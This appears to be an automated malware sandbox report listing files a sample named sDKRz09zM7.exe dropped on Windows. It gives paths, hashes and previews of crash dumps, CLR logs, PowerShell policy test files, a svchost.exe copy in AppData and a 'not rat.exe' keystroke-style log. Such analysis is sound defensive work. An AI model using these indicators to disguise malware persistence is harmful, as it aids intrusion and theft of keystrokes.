                                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.5.5.3.6.9.3.3.2.5.4.0.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.5.5.3.6.9.6.7.6.2.9.0.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.e.f.9.a.6.5.-.c.5.2.0.-.4.a.5.a.-.a.3.1.7.-.f.3.7.d.1.2.6.3.1.f.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.e.b.0.d.0.0.-.0.4.8.8.-.4.4.b.b.-.b.a.f.a.-.f.8.3.3.2.3.0.2.6.0.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...2.3._.M.o.d.d.e.d.B.y.H.i.s.a.k.o...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.0.-.0.0.0.1.-.0.0.1.4.-.3.b.d.7.-.3.1.5.5.2.4.4.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.4.a.d.2.5.2.c.c.5.8.3.4.f.6.0.3.4.7.

                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER61AC.tmp.dmp

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Sun Dec 1 19:08:15 2024, 0x1205a4 type
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):576140
                                                                                                                                                                                                                                            Entropy (8bit):3.20586189010752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:nuWskgJ3QZp3vz4aDBAHieBzBhH5CT1idI+kC99cgEpGo8gqaEF:nnuQZpL4aDqpgq
                                                                                                                                                                                                                                            MD5:0CF671E67EF001EA83D4A96226C4559E
                                                                                                                                                                                                                                            SHA1:86CF767CEB7E83D7C85242841F11C8F074E29548
                                                                                                                                                                                                                                            SHA-256:3BD5DC30A7E1E6920BC062FCAAB75E5637F1B0568EE9F86BF4223BD1A397A222
                                                                                                                                                                                                                                            SHA-512:98D035593B66F738A1A861EDCFB976EED53F6AD06C44535B5065FFC9AB1F79358D38C13E9AA310ADFE7A1D97A96BCB35912ACE847B8164AE91BE51696BF4E5DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MDMP..a..... .........Lg............4...........d...T.......<....(...........(......TQ..2...........l.......8...........T...........`U..,u...........D...........F..............................................................................eJ......,G......Lw......................T.............Lg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D17.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6872
                                                                                                                                                                                                                                            Entropy (8bit):3.723371954899362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:RSIU6o7wVetbSsD1L416bYZW7/8hDw5aM4UW89bPTWDwtfbP9Lm:R6l7wVeJRDp412YZ48GprW89bbWcfDJm
                                                                                                                                                                                                                                            MD5:EEA2DB3F3C45F84850A8A8CA3510ABD6
                                                                                                                                                                                                                                            SHA1:21B1A1E4DCB2F38D0507E2DE9C21F5F610E308E3
                                                                                                                                                                                                                                            SHA-256:FB320A5E229E42FFB3416E95D747EE5864223EE4EF62988BE038BBBBA95CAABB
                                                                                                                                                                                                                                            SHA-512:46BC1133DA551188C94AE6376573E98F258BE5B88A4699F3847694F12F4C1D5F4E44EC0CD62F2DED84ECCB205232A7C11BFA8E2AF99AC458229B6E2D18F0797D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.2.4.<./.P.i.

                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D57.tmp.xml

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4901
                                                                                                                                                                                                                                            Entropy (8bit):4.505549244466469
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsZDMtJg771I9XNbeWpW8VY6Ym8M4JQRjdeRC/F3yq8vaRChdRjdtbRjP:uIjfYI7mr7VeJyWHjtld
                                                                                                                                                                                                                                            MD5:6B7C6F2B545C94EDBE32A1AF574E0D74
                                                                                                                                                                                                                                            SHA1:4AAC1C17E77C462777A4BDD1DFFA06A0A3FA0D4B
                                                                                                                                                                                                                                            SHA-256:B816BA609D17C808355FC4CECC64BF9887E02A2AA833A9F4948077A66A6C6D78
                                                                                                                                                                                                                                            SHA-512:6762CCA9A2649B70AAC292358695446D6EF952AD103F73932BA2E6C606F30EAF59D835DE1187AA06845D3299EECE1ECC9BC063A11DB3A263E8B3D0A255515427
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="612610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D64.tmp.csv

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):77578
                                                                                                                                                                                                                                            Entropy (8bit):3.059647567802414
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:DTbeWWk5ZkgEifBUXGgLqJTCEsz97UpKzRKTKcqF7pU:DTbeWWk5ZkgEifBUXGgLqJTCEszZUpK8
                                                                                                                                                                                                                                            MD5:B2B3C557D84904A2E3F0544E8AE391F5
                                                                                                                                                                                                                                            SHA1:1D258CD49B7865C6B4392C4DC56DEE8AB3DA9160
                                                                                                                                                                                                                                            SHA-256:387967CD25A3DA28919569C1C211F6A06641678DF4155FB993F2742FA4AC175E
                                                                                                                                                                                                                                            SHA-512:BE4067CBEEA01E7C17F428AB58F5BACC7F7D28337A27916ACB3E9F054CEF21B79DAF337A732AA756DEF8F7A78D07693DC0BE83602E68D54ECD97320FC121DEB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E7E.tmp.txt

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                                                                            Entropy (8bit):2.685020618207537
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:TiZYWEoRoI8AY8Y9WhHYYEZ9BtFi1E1new85QSa+o3MS9tIY+3:2ZDEAb2Sha+o3MS9yY+3
                                                                                                                                                                                                                                            MD5:076A1EEBDCC93DF4D0D2E8E892C2CE2D
                                                                                                                                                                                                                                            SHA1:F5D53BC6663492BE5E8757C1FBF489322ADFA9C6
                                                                                                                                                                                                                                            SHA-256:D37964F4936D6376DD32ABCC3C64D0E6A4BBC95AF935283DF200ECBE20094B42
                                                                                                                                                                                                                                            SHA-512:D72774CA64A393122D22343529000D69C81949B4C3A01DCA1120DCBC3AE951C235DE6A6F73B9DE525A205549A7AE1CE49BF56A17A6CD33438A7EC2488730AB5F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sDKRz09zM7.exe.log

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sDKRz09zM7.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):654
                                                                                                                                                                                                                                            Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):654
                                                                                                                                                                                                                                            Entropy (8bit):5.380476433908377
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                                                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                                                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                                                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                                                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\not rat.exe
                                                                                                                                                                                                                                            File Type:Generic INItialization configuration [WIN]
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                            Entropy (8bit):3.6722687970803873
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                                                                                                                                                                                                            MD5:DE63D53293EBACE29F3F54832D739D40
                                                                                                                                                                                                                                            SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                                                                                                                                                                                                            SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                                                                                                                                                                                                            SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0rjaeppd.qcr.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uh40klj.h4p.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dm2vpvl.tbv.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a1los2t.dg0.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alnmr00w.an3.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_attj5shz.a2w.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bezah24f.glh.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
